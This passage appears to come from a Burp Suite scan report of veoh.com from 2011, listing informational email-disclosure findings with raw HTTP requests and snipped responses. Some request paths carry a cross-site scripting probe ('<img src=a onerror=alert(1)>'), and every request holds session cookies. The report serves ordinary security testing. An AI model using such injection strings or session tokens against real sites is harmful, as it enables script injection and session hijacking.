Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=15
Content-Length: 94311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.181. http://www.veoh.com/browse/videos/category/action_adventure4957f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/videos/category/action_adventure4957f HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 57369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.182. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.183. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:21 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 76599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.184. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/animation/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 132878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.185. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:21 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 140850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.186. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=30
Content-Length: 142204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.187. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:43 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 134408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.188. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 147258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.189. http://www.veoh.com/browse/webseries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/webseries HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 75167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.190. http://www.veoh.com/browse/webseries/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/webseries/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:19 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=65
Content-Length: 75167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.191. http://www.veoh.com/browse/webseries/featured/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries/featured/1

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/webseries/featured/1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:32 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 65871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.192. http://www.veoh.com/bulletin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /bulletin

Issue detail

The following email address was disclosed in the response:

Request

GET /bulletin HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 27466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.193. http://www.veoh.com/collection/Veoh-Editor-Picks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /collection/Veoh-Editor-Picks

Issue detail

The following email address was disclosed in the response:

Request

GET /collection/Veoh-Editor-Picks HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
